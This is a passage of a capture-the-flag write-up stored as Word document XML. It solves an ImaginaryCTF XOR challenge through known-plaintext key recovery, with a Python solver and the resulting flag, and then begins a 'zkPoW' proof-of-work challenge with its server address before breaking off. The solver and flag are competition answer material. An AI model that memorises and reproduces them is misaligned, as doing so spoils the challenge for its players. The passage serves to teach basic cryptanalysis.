    <w:p w14:paraId="0E976CD7" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="00000000" w:rsidP="0030196E">
      <w:r>
        <w:pict w14:anchorId="717BCC55">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62373A29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t>Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF30BA" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wait, i thought XORing something with itself gives all 0s???</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD36BE" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>We are given a ciphertext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA1BE0" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>65 6c ce 6b c1 75 61 7e 53 66 c9 52 d8 6c 6a 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C15CD" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>6e 6e de 52 df 63 6d 7e 75 7f ce 64 d5 63 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D2082" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="00000000" w:rsidP="0030196E">
      <w:r>
        <w:pict w14:anchorId="355ABA96">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74D633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t>Step 1: Analyzing the hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A1421" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>The challenge hint reminds us of the XOR properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F31944" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⊕</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> x = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D3964" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⊕</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> 0 = x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F9C8D" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">This suggests the scheme is </w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XOR-based encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t>, possibly with the flag itself (or part of it) used as the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495A45E" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="00000000" w:rsidP="0030196E">
      <w:r>
        <w:pict w14:anchorId="74B4E0EF">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF6724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t>Step 2: Known plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB4A45F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">In ImaginaryCTF, flags always start with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>ictf{ and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> end </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>with }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312B79D" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>That means we already know part of the plaintext. If we XOR ciphertext with plaintext, we can directly recover the key bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201AD97B" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">key[i] = cipher[i] </w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⊕</w:t>
      </w:r>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> plain[i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115F62F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>This gives us the repeating key used in the XOR scheme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02925340" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="00000000" w:rsidP="0030196E">
      <w:r>
        <w:pict w14:anchorId="5A2625DC">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290807D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t>Step 3: Solving with Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E04C5" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>We wrote a solver that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529BD61" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:t>Guesses possible key lengths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52F479" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">Uses the known prefix </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>ictf{ and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>suffix }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve"> to recover key bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279B5AC" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:t>Checks that the decrypted plaintext is printable and flag-shaped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B8118" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:lastRenderedPageBreak/>
        <w:t>cipher_hex = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD44810" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>65 6c ce 6b c1 75 61 7e 53 66 c9 52 d8 6c 6a 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD7F8F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>6e 6e de 52 df 63 6d 7e 75 7f ce 64 d5 63 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05733A3D" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>""</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>".strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>).replace</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>("\n"," ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DECDC" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E"/>
    <w:p w14:paraId="4FC47E53" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">C = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>bytes.fromhex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>(cipher_hex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F1E27" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E"/>
    <w:p w14:paraId="6AA49C80" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>solve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4814CEA4" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">    for L in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>2, 32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614831E2" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        key = [None]*L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE8FCF" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        known = [(0, ord('i')), (1, ord('c')), (2, ord('t')), (3, ord('f')), (4, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>ord(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>'{')),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFB079" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">                 (len(C)-1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>ord(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>'}'))]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1D53E" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        ok = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E89B5" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        for i, ch in known:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05CAF5" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">            k = C[i] ^ ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47E98E" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">            r = i % L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7AA2D" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">            if key[r] is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A86607" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">                key[r] = k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EE0AE" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">            elif key[r</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>] !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>= k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE274A" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">                ok = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795FE94" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20542C30" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        if not ok: continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FFEA9" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E"/>
    <w:p w14:paraId="44496F56" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        P = bytes(C[i] ^ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>key[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>i % L] for i in range(len(C)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50411D31" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>P.startswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>(b"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>ictf{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">") and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>P.endswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>(b"}"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09D0AB" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>P.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97113B" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E"/>
    <w:p w14:paraId="3A7CC77F" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>solve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030196E">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE1C6A" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="00000000" w:rsidP="0030196E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="04875EA3">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32950113" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030196E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19570554" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>Running the solver recovers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A742FAC" w14:textId="77777777" w:rsidR="0030196E" w:rsidRPr="0030196E" w:rsidRDefault="0030196E" w:rsidP="0030196E">
      <w:r w:rsidRPr="0030196E">
        <w:t>ictf{xor_is_bad_bad_encryption}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94D3DC" w14:textId="77777777" w:rsidR="0030196E" w:rsidRDefault="0030196E"/>
    <w:p w14:paraId="7A46A297" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="46B377A9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="6DDB892B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="5CCBB955" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="0F0C8C4C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="0F1FBCC7" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="5D952745" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="143569DF" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="77305F6C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="76817C6A" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="63970E3F" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="6FA57242" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="326D01FB" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="49F560A3" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="59757837" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="123DFB06" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="4FF06DBE" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="3416BDE3" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="215CD9AF" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="67731C40" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="63A7FA63" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="599822C6" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="5151B574" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="1F04B239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lastRenderedPageBreak/>
        <w:t>zkPoW (Crypto / Pwn hybrid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12360735" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge description (paraphrased):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF2F35" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>Designed a new way to stop brute-forcing pwn challenges: a “zk-proof-of-work.”</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>50 rounds, each round sends you a graph (n vertices, edges).</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>You must return a zero-knowledge proof that the graph is 3-colorable.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:br/>
        <w:t>You have 5 seconds per round.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82CB82" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>nc zkpow.chal.imaginaryctf.org 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C63077" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="634923A5">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E10D5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1 – Understanding the verifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24189FC9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>From the provided server code (zkpow.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB6A4C7" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commit phase</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3178">
        <w:t>: For each vertex v, prover commits to (color, nonce) with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC606C" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:t>leaf = SHA256("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>vertex:v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>color:nonce</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C1249" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>and builds a Merkle tree over all leaves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26064886" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
